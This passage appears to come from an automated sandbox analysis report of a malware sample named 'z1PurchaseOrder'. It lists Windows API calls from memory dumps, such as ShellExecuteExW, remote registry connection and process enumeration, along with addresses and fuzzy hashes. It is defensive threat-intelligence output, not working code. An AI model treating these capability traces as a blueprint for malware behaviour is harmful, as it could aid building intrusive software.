                                        • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444C9C
                                        • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444CBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: MessagePost$KeyboardState$Parent
                                        • String ID:
                                        • API String ID: 87235514-0
                                        • Opcode ID: de9aba9e896a2e755c79cba499ec14fd455f1b60db9a9f79a8626ad1a28ad6a0
                                        • Instruction ID: 4493abccadab05ae7d00f733e1fa63583af0c494729619d74f1516a50adc8d80
                                        • Opcode Fuzzy Hash: de9aba9e896a2e755c79cba499ec14fd455f1b60db9a9f79a8626ad1a28ad6a0
                                        • Instruction Fuzzy Hash: A951E4F05097D139F7369364884ABA7BFE46F8A304F088A4EF1D5065C2D2ACE984C769
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2552f041a71837ba3affbc4ec308d2b7aa0755a9e2dfe05148a880b05b5b76bf
                                        • Instruction ID: b3b3da583a0ae8cfa3180eda0e634cae40a493ebdfd517dbec9d2fd4fbd82cb1
                                        • Opcode Fuzzy Hash: 2552f041a71837ba3affbc4ec308d2b7aa0755a9e2dfe05148a880b05b5b76bf
                                        • Instruction Fuzzy Hash: 1E513A315082909FE321CF14DC89FABBB64FB46320F18456FF895AB2D1D7649C06D7AA
                                        APIs
                                          • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AA77
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: ConnectRegistry_wcslen
                                        • String ID: HH
                                        • API String ID: 535477410-2761332787
                                        • Opcode ID: a31a44ff546351b1de52d8f34745bf25342c9426a619c9766caf2b0061db1f75
                                        • Instruction ID: 7b41397762752e7dec08e47bcdb2cb2f58790b6f4670524580eb9da3090621e6
                                        • Opcode Fuzzy Hash: a31a44ff546351b1de52d8f34745bf25342c9426a619c9766caf2b0061db1f75
                                        • Instruction Fuzzy Hash: A2516D71208301AFD304EF65C981F5BB7A9BFC4704F40892EF685A7291D678E905CB6B
                                        APIs
                                        • _memset.LIBCMT ref: 00457C34
                                        • _memset.LIBCMT ref: 00457CE8
                                        • ShellExecuteExW.SHELL32(?), ref: 00457D34
                                          • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                          • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                        • CloseHandle.KERNEL32(?), ref: 00457DDD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: _memset$CloseExecuteHandleShell_wcscpy_wcslen
                                        • String ID: <$@
                                        • API String ID: 1325244542-1426351568
                                        • Opcode ID: bce0cc86945754dfb230170ecd4c21a915d6526e7c9b1e7fd723952314da78dd
                                        • Instruction ID: 09e461bdfc47c8bdd671eddb31188d347eda7c51057725e13e77015b5001baed
                                        • Opcode Fuzzy Hash: bce0cc86945754dfb230170ecd4c21a915d6526e7c9b1e7fd723952314da78dd
                                        • Instruction Fuzzy Hash: EA510FB55083009FC710EF61D985A5BB7E4AF84709F00492EFD44AB392DB39ED48CB9A
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(?,?,?,?,?,?,?,?,?,00000002,00000000,00000014), ref: 0047379B
                                        • Process32FirstW.KERNEL32(00000000,?), ref: 004737A8
                                        • __wsplitpath.LIBCMT ref: 004737E1
                                          • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                        • _wcscat.LIBCMT ref: 004737F6
                                        • __wcsicoll.LIBCMT ref: 00473818
                                        • Process32NextW.KERNEL32(00000000,?), ref: 00473844
                                        • CloseHandle.KERNEL32(00000000,00000000,?,?), ref: 00473852
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                        • String ID:
                                        • API String ID: 2547909840-0
                                        • Opcode ID: 1dcf289f501924a5df592eae16a0ec0030d5246948486ec38c60cdc62178aa5b
                                        • Instruction ID: 8efa427203ffd7a45d167e3a64f6abf3f3640219bb0751621114887cb14f0fc1
                                        • Opcode Fuzzy Hash: 1dcf289f501924a5df592eae16a0ec0030d5246948486ec38c60cdc62178aa5b
                                        • Instruction Fuzzy Hash: 4751BB71544304A7D720EF61CC86FDBB3E8AF84748F00492EF58957182E775E645C7AA
                                        APIs
                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 004552B7
                                        • ImageList_Remove.COMCTL32(?,?,?,?), ref: 004552EB
                                        • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004553D3
                                        • DeleteObject.GDI32(?), ref: 0045564E
                                        • DeleteObject.GDI32(?), ref: 0045565C
                                        • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                        • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                        • String ID:
                                        • API String ID: 2354583917-0
                                        • Opcode ID: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
                                        • Instruction ID: 19c5dc8500d05a42ca126c51664c70dafe1d1a8ca3b523478e8997b137d6e309
                                        • Opcode Fuzzy Hash: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
                                        • Instruction Fuzzy Hash: 77519D30204A419FC714DF24C4A4B7A77E5FB49301F4486AEFD9ACB392DB78A849CB54
                                        APIs
                                          • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                        • GetMenu.USER32 ref: 004776AA
                                        • GetMenuItemCount.USER32(00000000), ref: 004776CC
                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 004776FB
                                        • _wcslen.LIBCMT ref: 0047771A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Menu$CountItemStringWindow_wcslen
                                        • String ID:
                                        • API String ID: 1823500076-0
                                        • Opcode ID: 3c1e0179b5075f45df12b398ec391808b8d2f1e7a16a5d1bec5683dd9427006f
                                        • Instruction ID: 4b9e656becebfc5f52f27a1d7ad2c07a58398098864d75d3a5ce1c02cc274359
                                        • Opcode Fuzzy Hash: 3c1e0179b5075f45df12b398ec391808b8d2f1e7a16a5d1bec5683dd9427006f
                                        • Instruction Fuzzy Hash: 174117715083019FD320EF25CC45BABB3E8BF88314F10492EF55997252D7B8E9458BA9
                                        APIs
                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0044890A
                                        • SendMessageW.USER32(?,00000469,?,00000000), ref: 00448920
                                        • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                        • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                        • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                        • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                        • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Window$Enable$Show$MessageMoveSend
                                        • String ID:
                                        • API String ID: 896007046-0
                                        • Opcode ID: 440e8810410bf42a4c8e03fd117b8fd843bde7e89b0e2674ab81ad81c9f8ea0f
                                        • Instruction ID: 0809a8548e22334437b8974569d6adfa08582830463fbdb99c3481629354d751
                                        • Opcode Fuzzy Hash: 440e8810410bf42a4c8e03fd117b8fd843bde7e89b0e2674ab81ad81c9f8ea0f
                                        • Instruction Fuzzy Hash: 63419E746043419FF7248B24C884B6FB7A1FB99305F18886EF98197391DA78A845CB59
                                        APIs
                                        • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00441452
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00441493
                                        • SendMessageW.USER32(00981BB0,000000F1,00000000,00000000), ref: 004414C6
                                        • SendMessageW.USER32(00981BB0,000000F1,00000001,00000000), ref: 004414F1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: MessageSend$LongWindow
                                        • String ID:
                                        • API String ID: 312131281-0
                                        • Opcode ID: ed470013e842d905752aa6f8daaa5f1d8e955df317e7b96a507e5c494099af20
                                        • Instruction ID: f6a862a32ccfd92e4f153a1965fa7dc80102ffdb8abe4b8a046001f82176c48d
                                        • Opcode Fuzzy Hash: ed470013e842d905752aa6f8daaa5f1d8e955df317e7b96a507e5c494099af20
                                        • Instruction Fuzzy Hash: 2F416A347442019FE720CF58DCC4F6A77A5FB8A754F24416AE5519B3B1CB75AC82CB48
                                        APIs
                                        • _memset.LIBCMT ref: 004484C4
                                        • GetMenuItemInfoW.USER32(?,?,00000000,004A83D8), ref: 00448562
                                        • IsMenu.USER32(?), ref: 0044857B
                                        • InsertMenuItemW.USER32(?,?,00000001,004A83D8), ref: 004485D0
                                        • DrawMenuBar.USER32 ref: 004485E4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Menu$Item$DrawInfoInsert_memset
                                        • String ID: 0
                                        • API String ID: 3866635326-4108050209
                                        • Opcode ID: 42a201a1e731261e29c9ff9b40de176b55a78da0b06957c9f64dc5096dc7767a
                                        • Instruction ID: c1b4c65bd9dbf201e14e83578cc8030a3c247867dd5f1e451e409e2153a24926
                                        • Opcode Fuzzy Hash: 42a201a1e731261e29c9ff9b40de176b55a78da0b06957c9f64dc5096dc7767a
                                        • Instruction Fuzzy Hash: 9F417F75604341AFE710CF45C984B6BB7E4FB89304F14881EFA554B391DBB4E849CB5A
                                        APIs
                                        • InterlockedIncrement.KERNEL32 ref: 0047247C
                                        • InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472491
                                        • Sleep.KERNEL32(0000000A), ref: 00472499
                                        • InterlockedIncrement.KERNEL32(004A7CAC), ref: 004724A4
                                        • InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472599
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Interlocked$DecrementIncrement$Sleep
                                        • String ID: 0vH
                                        • API String ID: 327565842-3662162768
                                        • Opcode ID: bfb173672284e31ba0a3017bb0c7d670cf276827bd066f711b3c3b49063f60eb
                                        • Instruction ID: 7246262c18bb701d5349304b0e2d21290bf7c9637501dd5a114e6955e8e78370
                                        • Opcode Fuzzy Hash: bfb173672284e31ba0a3017bb0c7d670cf276827bd066f711b3c3b49063f60eb
                                        • Instruction Fuzzy Hash: 9631D2329082259BD710DF28DD41A8A77A5EB95324F05483EFD08FB251DB78EC498BED
                                        APIs
                                        • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448B16
                                        • GetFocus.USER32 ref: 00448B1C
                                        • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                        • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                        • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                        • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                        • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Window$Enable$Show$FocusMessageSend
                                        • String ID:
                                        • API String ID: 3429747543-0
                                        • Opcode ID: f5aca3f6d68f8169105ace43209457086b036621b25274999c7621d4cb9b91fc
                                        • Instruction ID: 96ed947056310062a3fa6d2350adc65d304252fdbf70c479ab88671ed4e09c2c
                                        • Opcode Fuzzy Hash: f5aca3f6d68f8169105ace43209457086b036621b25274999c7621d4cb9b91fc
                                        • Instruction Fuzzy Hash: FC31B4706443819BF7248E14C8C4BAFB7D0EB95745F04492EF981A6291DBA89845C719
                                        APIs
                                        • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042A9B0
                                          • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                        • _memset.LIBCMT ref: 00401C62
                                        • _wcsncpy.LIBCMT ref: 00401CA1
                                        • _wcscpy.LIBCMT ref: 00401CBD
                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: IconLoadNotifyShell_String_memset_wcscpy_wcslen_wcsncpy
                                        • String ID: Line:
                                        • API String ID: 1620655955-1585850449
                                        • Opcode ID: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
                                        • Instruction ID: a4e7cf3abc31881c2b93aaae0beefbbd48c64772eea77d32b53e92a0700a02c6
                                        • Opcode Fuzzy Hash: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
                                        • Instruction Fuzzy Hash: 7431D47151C301ABD324EB11DC41BDB77E8AF94314F04493FF989521A1DB78AA49C79B
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D32F
                                        • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3B3
                                        • __swprintf.LIBCMT ref: 0045D3CC
                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D416
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: ErrorMode$InformationVolume__swprintf
                                        • String ID: %lu$HH
                                        • API String ID: 3164766367-3924996404
                                        • Opcode ID: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
                                        • Instruction ID: e4de0c6df68350460ad5232616e5185c9d799459bd1b640414cfcbd8d86849a8
                                        • Opcode Fuzzy Hash: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
                                        • Instruction Fuzzy Hash: 85314A716083019BC310EF55D941A5BB7E4FF88704F40892EFA4597292D774EA09CB9A
                                        APIs
                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450E24
                                        • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450E35
                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450E43
                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450E54
                                        • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450E62
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: Msctls_Progress32
                                        • API String ID: 3850602802-3636473452
                                        • Opcode ID: 42656bfbb5a190feb894f1e63281698c22ff60bbec02a0e57f9bf8616b6fd2a5
                                        • Instruction ID: b51c377fab27852337593a8f268aff884918310fa347e0537580fa9f3b853d23
                                        • Opcode Fuzzy Hash: 42656bfbb5a190feb894f1e63281698c22ff60bbec02a0e57f9bf8616b6fd2a5
                                        • Instruction Fuzzy Hash: 2C2121712543007AE7209A65DC42F5BB3E9AFD8B24F214A0EF754B72D1C6B4F8418B58
                                        APIs
                                        • ImageList_Destroy.COMCTL32(?), ref: 00455451
                                        • ImageList_Destroy.COMCTL32(?), ref: 0045545F
                                        • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                        • DeleteObject.GDI32(?), ref: 0045564E
                                        • DeleteObject.GDI32(?), ref: 0045565C
                                        • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                        • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                        • String ID:
                                        • API String ID: 3985565216-0
                                        • Opcode ID: dc022e11ae60a508d3fee16e2099accab07c71a042b18f60c16d9d094d7ead98
                                        • Instruction ID: 02eb1b45cc7e926b76574f27881fb1e8d9d372094f4d7b34cf8607babd6cb63d
                                        • Opcode Fuzzy Hash: dc022e11ae60a508d3fee16e2099accab07c71a042b18f60c16d9d094d7ead98
                                        • Instruction Fuzzy Hash: EA213270200A019FCB20DF65CAD4B2A77A9BF45312F50855EED45CB352DB39EC45CB69
                                        APIs
                                        • ___set_flsgetvalue.LIBCMT ref: 00415737
                                        • __calloc_crt.LIBCMT ref: 00415743
                                        • __getptd.LIBCMT ref: 00415750
                                        • CreateThread.KERNEL32(00000000,?,0041568B,00000000,00000004,00000000), ref: 00415776
                                        • ResumeThread.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00415786
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 00415791
                                        • __dosmaperr.LIBCMT ref: 004157A9
                                          • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                          • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
